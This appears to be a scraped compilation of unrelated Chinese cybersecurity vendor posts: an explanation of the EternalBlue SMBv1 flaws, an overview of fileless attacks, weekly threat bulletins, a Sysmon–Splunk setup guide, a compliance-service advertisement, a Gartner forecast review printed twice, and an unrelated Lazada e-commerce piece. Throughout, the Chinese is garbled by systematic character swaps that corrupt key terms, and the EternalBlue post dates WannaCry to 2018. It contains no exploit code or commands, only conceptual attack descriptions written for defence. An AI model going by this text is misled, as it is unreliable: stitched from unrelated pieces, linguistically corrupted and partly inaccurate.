近日，Tellyouthepass勒索病毒被发现再次沉闷，攻击者利用了EternalBlue（永恒之蓝）内网扩散模块集成到勒索攻打包中，实现内网蠕虫式病毒传播，并已对局部企业进行攻打，如果没有采取及时的防护措施，可能给企业带来微小的损失。 tellyouthepass中永恒之蓝的利用代码 永恒之蓝是何方神圣 永恒之蓝是美国国家安全局开发的破绽利用程序，于2017年4月14日被黑客组织Shadow Brokers透露。永恒之蓝蕴含过程间通信共享（IPC $），该共享容许空会话。这意味着该连贯是通过匿名登录建设的，默认状况下容许空会话，空会话容许客户端向服务器发送不同的命令。 自2018年永恒之蓝被WannaCry利用并在寰球各国掀起风波之后，热度至今没有消减。尽管微软于2017年公布过Microsoft Windows补丁，修补了这个破绽，当初仍然有许多黑客利用永恒之蓝进行攻打。与此同时该程序也在一直进化，甚至造成了每周更新的传统，曾将EXE攻击方式逐渐切换到利用Powershell脚本实现无文件攻打。 永恒之蓝的工作机制 永恒之蓝依赖于一个名为srv!SrvOS2FeaListSizeToNt的windows函数。要理解它是如何导致近程执行代码，首先须要理解SMB的工作机制。SMB（服务器音讯块）是一种协定，用于通过网络从服务器零碎申请文件和打印服务。在协定的标准中，有一些构造能够使协定传播无关文件扩大属性的信息，实质上是无关文件系统上文件属性的元数据。 在此基础上，永恒之蓝利用了协定中的三个不同的谬误。 第一个谬误是当协定试图将OS / 2 FileExtended Attribute（FEA）列表构造转换为NT FEA构造以确定要调配多少内存时呈现的数学谬误。错误计算会产生整数溢出，导致调配的内存少于预期的数量，进而导致缓冲区溢出。如果写入的数据超出预期，则多余的数据可能溢出到相邻的存储空间中。 第二个谬误是因为SMB协定对两个相干子命令：SMB_COM_TRANSACTION2和SMB_COM_NT_TRANSACT的定义不同而导致的缓冲区溢出。两者都有一个_SECONDARY命令，当单个分组中蕴含太多数据时应用该命令。TRANSACTION2和NT_TRANSACT之间的要害区别在于，后者须要一个数据包，大小是前者的两倍。如果客户端应用NT_TRANSACT紧接在前的子命令发送精心制作的音讯，则会产生TRANSACTION2验证谬误。尽管协定辨认出两个离开的子命令已被接管到，其调配的类型和尺寸的数据包（并相应地分配内存）仅基于接管到的最初一个数据包的类型。因为最初一个较小，因而第一个数据包将占用比调配的更多的空间。 一旦攻击者实现了最后的溢出，他们就能够利用SMBv1中的第三个bug，该bug呈现在SMB_COM_SESSION_SETUP_ANDX命令中：该命令的申请依赖于WordCount的值来确定具体的申请格局，当为12时和为13时红框中的变量会有所区别，利用该破绽将12类型的申请包通过13类型进行解决，因为两种类型的申请包格局不统一，通过管制申请包指定偏移的数据，即能够管制SrvAllocateNonPagedPool创立的pool的大小，实现堆喷射，导致在指定地址分配内存，使得攻击者能够编写和执行Shellcode来控制系统。 如何防止利用永恒之蓝的攻打 首先，确保更新并利用安全补丁MS17-10，其次禁用SMBv1，并且不使任何易受攻击的计算机拜访互联网。 以后网络局势下，已呈现疑似永恒之蓝病毒变种，例如：wannaRen的病毒，应答这些新的威逼，传统防护伎俩很难无效防备，安芯网盾内存保护零碎通过硬件虚拟化技术对内存歹意行为进行监控，可能无效检测到内存中缓冲区溢出、堆栈溢出、部署shellcode、执行shellcode、等歹意行为，无效防护这类新威逼。 参考文献： [1]https://www.sentinelone.com/b... [2]https://www.anquanke.com/post... [3]https://zh.wikipedia.org/wiki... [4]https://www.freebuf.com/mob/a...

“我还有机会吗？”往年初夏大火的电视剧《隐秘的角落》中，这样一句看似平时的话，背地却暗藏杀机，剧中的所有看似人畜有害，实则毁天灭地。这样的景象同样存在于网络世界中，比方无文件攻打，近年来无文件攻打简直成为攻击者的标配，攻击者变得更聪慧、更有急躁、更刁滑，他们悄无声息的渗透到主机内存，而后待在那里期待数天甚至数月，期间没有任何心跳信息可供传统平安产品检测，他们会在某一刻忽然给攻打指标致命一击。 “无文件攻打”不代表没有文件，而是指恶意程序文件不间接落地到指标零碎的磁盘空间上的一种攻打手法，它们能够回避传统的平安检测机制。无文件攻打曾经成为了一种趋势，“离地/隐形/无文件”曾经成为了热门的关键词。 隐秘的攻打手法：无文件攻打的三种类型 无文件攻打到底是如何侵入零碎的呢？依据无文件攻打的攻打入口点，无文件攻打的品种可分为：齐全无文件攻打、间接利用文件、仅操作须要的文件这三种类型。 类型一：齐全无文件攻打 齐全无文件的攻打能够被视为不须要在磁盘上写入文件的恶意软件。那么，此类恶意软件如何感化计算机？ 第一种状况是没有借助外部设备的齐全无文件攻打。例如，指标计算机接管利用EternalBlue破绽的歹意网络数据包，导致DoublePulsar后门的装置，该后门最终仅驻留在内核内存中。在这种状况下，没有文件或任何数据写入文件。 另一种状况是利用设备来感化零碎，其中恶意代码可能暗藏在设施固件（例如BIOS），USB外设（例如BadUSB攻打）甚至网卡固件中。所有这些示例都不须要磁盘上的文件即可运行，并且实践上只能驻留在内存中，即便重新启动，从新格式化磁盘和重新安装OS也能幸存。 类型二：利用间接文件 恶意软件还有其余办法能够在机器上实现无文件存在，并且无需进行大量的工程工作。这种类型的无文件恶意软件不会间接在文件系统上写入文件，但最终可能会间接应用文件。Poshspy后门就是这种状况。 攻击者在WMI存储空间中搁置了歹意的PowerShell命令，WMI存储库存储在物理文件上，该物理文件是CIM对象管理器治理的地方存储区域，通常蕴含非法数据。因而，只管感化链从技术上的确应用了物理文件，但出于理论目标，思考到WMI存储库无奈简略地检测和删除的多用途数据容器，另外并配置了WMI筛选器以定期运行该命令。通过这种无文件后门技术，攻击者能够结构一个十分独立的后门，并与他们之前的一般后门联合应用，确保在一般后门生效后还能实现对指标的持久性浸透。 类型三：仅操作须要的文件 一些恶意软件能够具备某种无文件的持久性，但并非不应用文件进行操作。这种状况的一个示例是Kovter，Kovter最常见的感化办法之一是来自基于宏的歹意垃圾邮件的附件。一旦单击了歹意附件（通常是受损的Microsoft Office文件），恶意软件就会在通常位于％Application Data％或％AppDataLocal％的随机命名的文件夹中装置快捷方式文件，批处理文件和带有随机文件扩展名的随机文件。基于随机文件扩展名的注册表项也装置在“HKEY_CLASSES_ROOT”中，以领导随机文件的执行以读取注册表项。这些组件用于执行恶意软件的外壳生成技术。这是该攻打的第一阶段。 在第二个阶段中，将为随机文件创建注册表项，其中蕴含执行KOVTER过程的歹意脚本。这意味着当受感化的计算机重新启动或触发快捷方式文件或批处理文件时，注册表项中的歹意脚本就会加载到内存中。歹意脚本蕴含外壳程序代码，恶意软件将其注入到PowerShell过程中。随后，外壳程序代码将解密位于同一注册表项中的二进制注册表项被注入到一个创立的过程中（通常为regsvr32.exe），生成的regsvr32.exe将尝试连贯各种URL，这是其点击欺诈流动的一部分。 防护无文件攻打：你还有机会吗？ 无文件攻打的实现得益于某些应用程序和操作系统所特有的性质，它利用了反恶意软件工具在检测和进攻方面的缺点，攻击者常利用破绽来入侵指标服务器，攻击者利用这种技术施行攻打时，也常常会利用一些非法程序来绕过零碎中的平安防护措施，比方浏览器、office软件、powershell.exe、cscript.exe等，滥用Microsoft Windows中内置的泛滥实用程序，歹意文件能够携带执行恶意代码的破绽，不会在指标主机的磁盘上写入任何的歹意文件。无文件攻打在胜利潜入内存并安宁下来后，便能够随心所欲，或进行挖矿、加密文件进行勒索、C&C攻打等，所有都看似非法有害。 以后无效的解决方案就是依赖于内核级的监控，捕捉每个目标程序的动静行为。安芯网盾所提供的实时防护无文件攻打解决方案，内存平安产品所采纳的内存保护技术，内存保护技术齐全独立于操作系统，能高效抵挡破绽相干的已知和未知内存篡改手法。因为其与操作系统齐全隔离，也就齐全不受客户机外部威逼的侵扰。利用裸机监管程序，内存自省技术可为虚构基础设施提供额定的平安层，避免黑客利用零日破绽或未修复破绽进行的攻打。 参考资料： [1]https://docs.microsoft.com/en... [2]https://www.trendmicro.com/vi...

一目了然，能力洞察先机。 随着信息化过程的不断深入，高级威逼变本加厉，更加荫蔽、威力更大的内存破坏型攻打成为以后的平安战场。 随着攻防反抗的倒退，基于内存的攻打办法越来越多，尽管企业部署了大量的平安防护产品，比方UTM、ADS、EDR、AV、IPS等等，攻击者仍然可能轻易的冲破层层防线，简单的攻打每天都在演出。以后很多企业面临的是平安问题从战略规划时开始，利用的平安须要重新考虑，基础架构的平安须要从新整合。 安芯网盾作为国内内存平安畛域的开拓者和创新者，填补国内在内存平安问题方面实时检测与进攻的空白，也为客户提供了新一代高级威逼实时防护解决方案。心愿能和更多搭档一起，爱护万物互联的数字世界。 重大的DNS谬误关上Windows服务器进行根底构造劫持 （7.17） Microsoft公布了针对此破绽的补丁程序，标识为CVE-2020-1350，并催促客户优先思考对其零碎进行更新。Check Point称该破绽为SigRed，这是对易受攻击的DNS组件和性能“ dns.exe”的致敬。该谬误已存在17年，受影响的是2003-2019年的Windows Server版本。该破绽是由Check Point钻研人员发现的，其严重性正告为10 –容许的最高正告。然而，该破绽是可蠕虫的，这意味着对该破绽的繁多利用会触发连锁反应，使攻打从一台计算机流传到另一台计算机。通过这一破绽，黑客能够取得服务器的域管理员权限，使黑客可能拦挡和操纵用户的电子邮件和网络流量，使服务不可用，播种用户的凭证等等。 俄罗斯黑客针对新冠疫苗开发的组织进行网络攻击流动 （7.17） 一个名为APT29的俄罗斯黑客组织正在针对美国，英国和加拿大的新冠钻研和疫苗相干的歹意网络流动。该组织应用各种工具和技术来针对参加新冠钻研和疫苗开发的组织。工具包含SOREFANG，WELLMESS和WELLMAIL恶意软件。WellMess恶意软件能够在WinPE (Windows预装置环境)和Linux上通过ELF(可执行和可链接格局)进行操作，使近程攻击者可能执行任意命令、上传和下载文件，或者运行PowerShell脚本主动执行工作。该组织应用了多个公开破绽对存在破绽的零碎进行扫描和利用，目标是获取凭证。在针对新冠疫苗研发的近期攻打中，该组织针对指标组织领有的特定内部IP地址进行了根本破绽扫描，有针对性地部署了公共的破绽利用程序。 巴西的银行木马向寰球感化 （7.16） 四个简单的恶意软件家族Guildma，Javali，Melcoz和Grandoreiro，统称为Tetrade，正在减少其技术，并踊跃地流传到包含美国在内的新国家。一般来说，恶意软件应用AutoIt或VBS脚本增加到MSI文件中，这些脚本应用DLL劫持技术运行歹意DLL，目标是绕过平安解决方案。他们正在迅速创立会员生态系统，招募网络犯罪分子与其余国家/地区单干，采纳MaaS（恶意软件即服务）并迅速向其恶意软件中增加新技术，以使其放弃相关性并在财务上具备吸引力。 往期回顾 内存平安周报01｜知己知彼，百战不殆 内存平安周报02｜防患未然，以守为攻 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

知己知彼，方能百战不殆。 上周，咱们推出了平安周报，次要聚焦在高级威逼或者新型攻打方面。以后的网络攻击趋势，把握着更多资源的组织、个人试图通过网络攻击来谋取利益，波及的畛域越来越多，网络攻击技术也越来越简单和精密，攻打工具的针对性越来越强，对攻打技术的隐蔽性、可靠性要求也越来越高，网络攻防反抗越来越强烈。 咱们看到，传统的平安边界被突破，针对服务器主机的攻打中，无文件攻打、内存毁坏等攻打伎俩成为首选攻击方式，而传统的平安解决方案在进攻新型攻打方面也暴露出短板：无奈进攻新型攻打、部署及接入繁琐、存在单点进攻缺点、治理及服务老本高。 心愿通过周报的分享，给大家提一个醒，防患未然，以守为攻。安芯网盾作为国内内存平安畛域的开拓者和创新者，填补国内在内存平安问题方面实时检测与进攻的空白，也为客户提供了新一代高级威逼实时防护解决方案。心愿能和更多搭档一起，爱护万物互联的数字世界。 1、Apache Guacamole破绽使得远程桌面有被黑客攻击的危险。 （0705） 一项新钻研发现了Apache Guacamole中的多个重大反向RDP破绽，Apache Guacamole是系统管理员用于近程拜访和治理Windows和Linux计算机的风行远程桌面应用程序。Guacamole中的内存损坏破绽（CVE-2020-9498）— 此破绽存在于rdpsnd和rdpdr（设施重定向）通道上的形象层（“ guac_common_svc.c”）中，是由内存平安抵触引起的，导致悬空指针，使攻击者能够通过联合两个缺点来实现代码执行。值得注意的是，到目前为止，Apache Guacamole远程桌面应用程序在Docker Hub上的下载量已超过1000万。 2、Purple Fox EK中减少了两项针对Microsoft关键性破绽的攻打。 （0706） 近日，Purple Fox EK减少CVE-2020-0674和CVE-2019-1458的破绽利用。已经Purple Fox木马感化过上万名用户，下载其它恶意程序，执行多种歹意操作。Purple Fox木马的新变种能够通过Rig破绽利用工具包流传，利用PowerShell脚本，能够使Purple Fox木马实现无文件感化。除此之外，Purple Fox木马的最新版本还带有额定的破绽利用代码，进步感化成功率。只有用户拜访带有Rig破绽利用工具包的歹意网站，就会将用户重定向到一个歹意PowerShell脚本。如果指标计算机带有拜访权限，这个歹意脚本会生成一个图片文件，通过msi.dll的API接口执行主组件。如果，以后指标计算机没有拜访权限，则歹意PowerShell脚本会通过PowerSploit模块利用破绽下载Purple Fox木马主组件。实质上来看，Purple Fox木马属于下载型木马，能够下载其它恶意软件，一旦用户感化就会面临各种威逼。 3、Snake勒索软件隔离受感化零碎后加密。 （0706） 平安专家最近发现了Snake（也称为EKANS）勒索软件的新样本，这些样本隔离受感化的零碎，而后对文件进行加密以防止烦扰。Snake示例实现了启用和禁用防火墙以及利用特定命令阻止与零碎的无害连贯的性能。Snake还将完结可能烦扰加密的任何过程，包含与工业软件、备份解决方案以及平安工具相干的过程。而后，恶意软件还会删除卷影正本，以避免受害者复原文件。 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

随着攻防反抗的倒退，基于内存的攻打办法越来越多，比方 UAF、DoubleFree、堆栈溢出等类型破绽都属于内存破坏型破绽。内存平安问题是各类零碎和利用所面临的最大攻打起源，只管企业和机构都部署了大量的平安防护产品，但攻击者依然可能轻而易举的冲破层层防线，简单的网络攻击在一直减少，现有的检测进攻计划生效，成为企业在平安能力建设中的痛点。微软、Google等全球性科技公司相继曝出近年来的平安威逼中70%都是内存安全漏洞，国内外对于内存平安问题的关注度也开始进步。 内存保护技术首次提出是在 2016 年，IT 征询公司 Gartner 将基于非签名办法的终端进攻技术（内存保护技术和破绽利用阻断技术）列为面向未来的十大信息安全技术之一，2018 年美国驰名 IT 杂志 CRN将 内存保护产品评为 20 个要害翻新热门平安产品中的 top1 。 安芯网盾作为国内内存平安畛域的开拓者和创新者，在2019年年中推出内存平安产品，填补国内在内存平安问题方面实时检测与进攻的空白，也为客户提供了新一代高级威逼实时防护解决方案。内存保护技术及相干产品开始在国内被媒体和行业关注。 那么，企业到底该如何进攻内存平安威逼，安芯网盾小编近日起在公众号推出了内存平安威逼周报，先从知己知彼开始，方能百战不殆。 1、针对意大利制作行业的高级攻打，疑似与 Gorgon APT 相干 （6.29） Gorgon APT（高级长久攻打）是一个老牌且高危的在线攻打，由Unit 42钻研人员于2018年2月首次发现。自2018年2月首次被发现以来，Gorgon APT始终在策动对政府组织（美国、英国、俄罗斯、西班牙等）的攻打以及对寰球企业指标的攻打。此外，2020年它推出了新性能CMSTP绕过攻打，因为被发现可利用此破绽的首批恶意软件可追溯到2019年中，这使研究者误认为攻击者应用的是处于比拟前沿的攻打技术。对于持久性机制，钻研人员留神到攻击者应用了最后打算的工作，然而在最新感化中应用了注册表运行键。所有攻打都至多应用一种混同办法，这使得剖析更加艰难。 2、CVE-2020-0796破绽可让近程且未经身份验证的攻击者在指标零碎上执行任意代码，该破绽相似于永恒之蓝。 （6.29） 微软颁布了在Server Message Block 3.0（SMBv3）中发现的“蠕虫型”预受权近程代码执行破绽。本次破绽源于SMBv3没有正确处理压缩的数据包，在解压数据包的时候应用客户端传过来的长度进行解压时，并没有查看长度是否非法，最终导致整数溢出。利用该破绽，黑客可间接近程攻打SMB服务端近程执行任意恶意代码，亦可通过构建歹意SMB服务端诱导客户端连贯从而大规模攻打客户端。 3、CVE-2020-9498：RDP动态虚构通道解决中的悬空指针 （7.2） Apache Guacamole 1.1.0和更早版本可能会错误处理波及的指针解决通过RDP动态虚构通道接管的数据。如果用户连贯到歹意或受感化的RDP服务器，特制PDU可能会导致内存损坏容许应用以下命令的特权执行任意代码正在运行guacd过程。 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

1.前置环境开源我的项目地址：该我的项目是将sysmon事件通过splunk app映射到ATT&CK上，能够疾速的进行剖析。 搭建过程中开始始终不出数据，这里记录搭建的过程。 https://github.com/olafhartong/ThreatHunting https://github.com/olafhartong/sysmon-modular 环境： Windows主机一台，曾经装置splunk转发器 Linux 服务器一台，曾经装置splunk 2.Windows 客户端配置2.1装置sysmonSysmon下载：https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon 规定文件下载（这个规定是这个我的项目配套的）： https://github.com/olafhartong/sysmon-modular/blob/master/sysmonconfig.xml 装置sysmon：sysmon.exe -accepteula -i sysmonconfig.xml 后续更新规定： sysmon.exe -c sysmonconfig.xml 验证：在事件查看器 应用程序和服务日志>Microsoft>Windows>Sysmon>Operational中能够看到事件日志。 2.2配置splunk采集在以下门路配置文件中，配置采集内容（老外的视频是把sysmon，splunk服务端装置在一起，所以间接在splunk中抉择即可，个别状况下都是要配置转发器） C:\Program Files\SplunkUniversalForwarder\etc\apps\SplunkUniversalForwarder\default门路下的inputs.conf配置文件，配置如下内容： [WinEventLog://Microsoft-Windows-Sysmon/Operational] disabled = false renderXml = false index = windows source = WinEventLog:Microsoft-Windows-Sysmon/Operational 如下图所示：（目标是为了采集Sysmon日志，并采集到splunk的windows索引中，指定source类型，不解析Xml。 这几行配置都很重要，跟前面的内容是一一对应的） 配置实现后，重启splunk， 到bin门路下执行splunk.exe restart 验证：在实现了3.3索引建设当前， 能够通过index=”windows”搜寻数据，source肯定要配对，不然关联不上数据 3.Linux服务端配置3.1装置threathunting APP在查找更多利用中搜寻 装置实现后会看到app呈现在列表中 3.2装置依赖APP,lookup文件进入threathunting APP，点击对于>About this app,会看到一堆依赖的app和csv文件 须要装置的app： Force Directed Visualisation App for Splunk Link Analysis App for Splunk ...

目前数字经济建设浪潮一浪高过一浪，与此同时我国的网络安全法也逐步失去遍及，撑持网络安全法的网络安全等级爱护相干标准规范也不断更新和欠缺。 落实网络安全等级爱护制度是网络运营者（指网络的所有者、管理者和网络服务提供者）的责任与任务。通常状况，无论是在建或已运行的零碎，实现一次等级爱护测评的全流程须要2-3个月工夫，有的须要半年甚至超过1年的也不在少数。 以北京为例，等级爱护备案阶段：申请与受理4个工作日、审查与决定8个工作日、制证与发证10个工作日。等级爱护测评与整改阶段更是须要破费大量工夫，个别须要1-2个月。 腾讯平安专家在近期的一个我的项目中，28天内疾速实现了一次等级爱护测评全流程。并从我的项目中总结了疾速实现等级爱护测评全流程的五大要害因素，即优选测评机构、零碎正当定级、筹备工作充沛、及时跟进流程、要害门路并进。在此分享给宽广网络运营者参考。 01 优选测评机构抉择测评机构时应尽量选取企业所在地的测评机构，综合思考其公司资质与技术能力，如测评公司具备的资质、各等级测评师人员数量、在市场中的口碑、被测评企业所属行业的测评案例等。同时明确提出本次测评的工期要求与我的项目估算，并采取邀请投标或公开招标的形式抉择最优的测评机构。 02 零碎正当定级零碎定级是等级爱护测评的第一步，无论是在建零碎或已建零碎，正当定级是要害，应参照“定级过低不容许、定级过高不可取”的准则来定级。如同为等级爱护第三级可细分为S2A3、S3A3、S3A2三种类型，与之绝对应的等级爱护测评管制项就相差不少，将间接影响零碎设计、建设、运维的方方面面。 定级实现后需由平安专家与业务专家独特对定级报告中波及的零碎业务形容、业务网络拓扑、业务受影响的危险剖析进行专家评审并造成书面专家评审意见。最初定级报告与专家评审意见需上传到公安网警的等级爱护备案零碎中。 03 筹备工作充沛“磨刀不误砍柴功”，做好大量的筹备工作是疾速实现等保测评的先决条件。从业务零碎的全生命周期角度来看，须要具备我的项目立项、需要阐明、实施方案、验收规范、人员组织、管理制度等过程环节材料。 特地是网络安全方面，须要有网络安全的设计方案、建设实施方案、安全策略及平安检测标准、平安经营管理制度及平安建设经营过程文档（如破绽扫描报告、浸透测试报告、代码审计报告、应急预案与演练记录、人员培训记录等）。 针对规模大或重要性要求高的业务零碎其建设设计方案、平安保障计划须要延聘内部专家进行专家评审并造成书面专家评审意见。 04 及时跟进流程以广东为例，企业在公共信息网络安全综合管理系统填报前应受权一位负责人，并由其跟进后续备案材料收集与文档扫描、零碎填写与材料上传，同时关注审核反馈信息及时提交补充材料和订正材料。及时关注审核后果、获取备案证实及线下提交测评报告。 此过程中，遇到问题应及时反馈给上级领导，并协调资源推动等级爱护备案流程。 05 要害门路并进放慢我的项目进度个别可采取加班与并行赶工的形式，但前提是须要一名优良的项目经理来合成我的项目施行步骤，辨认并布局要害施行门路，把控治理我的项目施行过程危险。等级爱护测评过程次要可并行的环节有商务洽谈与技术施行、零碎建设与平安检测、零碎测评与整改复测。 那么如何通盘考虑上述5个因素，疾速实现等级爱护测评全流程呢？ 腾讯平安依靠资深专家服务团队，联合本身平安业务实际和单干生态劣势，为客户提供笼罩“测评+征询+产品+运维”的等保合规一站式服务。 · 等保测评服务：腾讯平安领有全国各地测评服务协调能力，助力企业发展等级爱护测评评审与备案。 · 等保咨询服务：腾讯平安专家团队参加平安管理制度的制订，安全策略配置，平安整改加固等，帮助客户以最小的投入，一次性疾速通过等保测评。 · 平安产品服务：提供齐备的云根底产品及平安产品抉择，对标等级爱护根本要求实现平安产品定制，并领导最佳实现工夫的安全策略。 · 平安运维服务：在等级爱护合规及维持的年度平安运维中，为企业提供业余服务反对。 目前，腾讯平安一站式等保合规解决方案，已胜利帮忙数字广东、一部手机游云南、如祺出行、第127届广交会等多家政企客户胜利过保。 划重点 腾讯平安专家服务推出等级爱护合规咨询服务为您解忧： 服务内容： 提供一次定级领导与差距剖析（解决方案）培训领导腾讯平安产品洽购与部署帮助实现定级报告编写提供定级报告专家评审征询提供定级评审专家库、测评机构举荐提供腾讯云租户等级爱护合规建设指南提供5*8专家坐堂联线征询服务形式：近程 服务周期：6个月 购买形式：腾讯云官网在线选购 服务报价：1万/二级零碎， 2万/三级零碎 特地惊喜：为赋能企业网络安全建设，前20位选购等级爱护咨询服务的用户，享有延聘一名腾讯资深平安专家为该企业的外聘平安专家参谋的权力，聘期为一年，另赠送神秘小礼品一份～ 聘书样例：

多年以来，Gartner的钻研数据与咨询服务被认为是主观技术思维领导的权威起源。作为寰球IT市场预测与征询的龙头，Gartner每年对外输入数十份市场钻研报告，成为寰球泛滥企业在市场剖析、技术抉择、我的项目论证、投资决策上的重要参考，所以Gartner每年预测的货色到底准不准？实现率有多少？ 基于多年对IT及前沿技术的关注和积攒，腾讯平安联结腾讯TEG平安平台部天幕团队对Gartner 2016年-2020年的年度策略技术趋势报告和平安我的项目报告进行回顾与利用状况评估。 一、报告概述报告回顾了2016年-2020年Gartner的年度策略技术趋势报告和平安我的项目报告，这是具备代表性的两份报告。报告将按年份顺次回顾每年的技术预测，并依据以后的利用状况评判是否精确，同时列出该技术畛域的现有代表厂商。 次要回顾报告包含： 《Gartner 年度十大策略技术趋势》（2016-2020） 《Gartner 年度十大平安我的项目》（2016-2020）二、次要发现总体来看，除了2016年在十大信息安全技术上的预测有些偏差，其余年份报告的趋势预测准确率均在90%的程度，所以Gartner被誉为寰球TOP 1的征询公司当之无愧。 而依据近5年来预测和真实情况比照，以下技术和我的项目值得持续关注： 前沿技术：AI与机器学习技术、AR与VR技术、自主物件、智能空间技术、云计算与边缘计算、区块链技术、零信赖技术与CARTA。 平安我的项目：云拜访平安代理（CASB）、云平安配置管理（CSPM）、IAM与PAM、邮件平安、CARTA、扩大检测与响应（XDR）、容器平安、软件定义边界（SDP）。 三、剖析后果（注：彩色为精确预测，橘色为半精确预测，蓝色为不计入统计，红色为非精确预测） 表1 Gartner 2016-2020年十大技术趋势 表2 Gartner 2016-2020年十大平安我的项目 附2016-2019年预测准确度表格Gartner 2016年十大技术趋势预测准确率 Gartner 2016年十大信息安全技术预测准确率-------------------------- Gartner 2017年十大技术趋势预测准确率------------------------ Gartner 2017年十一大信息安全技术预测准确率 Gartner 2018年十大技术趋势预测准确率 Gartner 2018年十大信平安我的项目预测准确率 Gartner 2019年十大技术趋势预测准确率 Gartner 2019年十大平安我的项目预测准确率 扫码关注腾讯平安公众号，回复“预测”即可获取完整版报告内容。

多年以来，Gartner的钻研数据与咨询服务被认为是主观技术思维领导的权威起源。作为寰球IT市场预测与征询的龙头，Gartner每年对外输入数十份市场钻研报告，成为寰球泛滥企业在市场剖析、技术抉择、我的项目论证、投资决策上的重要参考，所以Gartner每年预测的货色到底准不准？实现率有多少？ 基于多年对IT及前沿技术的关注和积攒，腾讯平安联结腾讯TEG平安平台部天幕团队对Gartner 2016年-2020年的年度策略技术趋势报告和平安我的项目报告进行回顾与利用状况评估。 一、报告概述报告回顾了2016年-2020年Gartner的年度策略技术趋势报告和平安我的项目报告，这是具备代表性的两份报告。报告将按年份顺次回顾每年的技术预测，并依据以后的利用状况评判是否精确，同时列出该技术畛域的现有代表厂商。 次要回顾报告包含： 《Gartner 年度十大策略技术趋势》（2016-2020） 《Gartner 年度十大平安我的项目》（2016-2020）二、次要发现总体来看，除了2016年在十大信息安全技术上的预测有些偏差，其余年份报告的趋势预测准确率均在90%的程度，所以Gartner被誉为寰球TOP 1的征询公司当之无愧。 而依据近5年来预测和真实情况比照，以下技术和我的项目值得持续关注： 前沿技术：AI与机器学习技术、AR与VR技术、自主物件、智能空间技术、云计算与边缘计算、区块链技术、零信赖技术与CARTA。 平安我的项目：云拜访平安代理（CASB）、云平安配置管理（CSPM）、IAM与PAM、邮件平安、CARTA、扩大检测与响应（XDR）、容器平安、软件定义边界（SDP）。 三、剖析后果（注：彩色为精确预测，橘色为半精确预测，蓝色为不计入统计，红色为非精确预测） 表1 Gartner 2016-2020年十大技术趋势 表2 Gartner 2016-2020年十大平安我的项目 附2016-2019年预测准确度表格Gartner 2016年十大技术趋势预测准确率 Gartner 2016年十大信息安全技术预测准确率-------------------------- Gartner 2017年十大技术趋势预测准确率------------------------ Gartner 2017年十一大信息安全技术预测准确率 Gartner 2018年十大技术趋势预测准确率 Gartner 2018年十大信平安我的项目预测准确率 Gartner 2019年十大技术趋势预测准确率 Gartner 2019年十大平安我的项目预测准确率 扫码关注腾讯平安公众号，回复“预测”即可获取完整版报告内容。

（1）Lazada在东南亚各国势头强劲 Lazada以印度尼西亚、马来西亚、菲律宾、泰国、新加坡、越南六国为核心，占这些国家电商的一半江山，当初东南亚有6亿5千万人口，正在迅速适应互联网。该地区网络销售市场潜力微小，东南亚网络经济到2025年将超过3,000亿美元。2019年上半年，Lazada年度被动用户冲破5000万人，这个数据在东南亚市场的电器商品APP中位居首位的过来4个季度，Lazada整体的订单数以3位数急速减少，在东南亚市场持续增长。 （2）Lazada越南地区是重点倒退地区 越南国情的起因:越南人口次要是年轻人。人口增长率很快。国家正处于“翻新凋谢”政策的稳固阶段。经济和政治正在稳步回升。欠缺相干电子商务法规，标准电子商务和网上转账领取渠道的倒退。这是一个无利的势头。 （3）Lazada严格标准入驻商户的行为，有欠缺的商户培训体系 Lazada的平台治理是完满的，包含对商户足够的培训措施，每个商户在进入之前都须要根底的标准了解，这也保障了消费者和高品质商户的权力。同时，它在成长门路、工具受权、培训领导和服务反对四个方面为商家的孵化和成长提供服务和反对，例如，它提供业余的卖家工具，为商家充沛提供独立的经营和营销空间。 （4）Lazada对入驻商家有绝对欠缺的保障体系。 只有在产品阐明不符、少邮寄、邮寄失误、破损等状况下，平台能力承受消费者的退货、退款。此外，入驻商家失去的产品订单都是由平台通过严格检测后的订单，这些订单可间接发货。商家在发货时，如果消费者曾经在Lazada平台上实现领取，就能够无效地升高商家面临的资金危险。 （5）Lazada领取形式比拟及时灵便 Lazada将负责跟踪零碎和业余人员在物流配送中的订单的实时状态，当订单显示曾经签订时，付款将在下周五间接记入您的付款人企业账户。 （6）Lazada账号只需1个就能公布6国，完满均衡了经营效率和本地化的深度经营。 （7）器重品牌反对，激励跨境业者发明从零到一打造出海品牌。

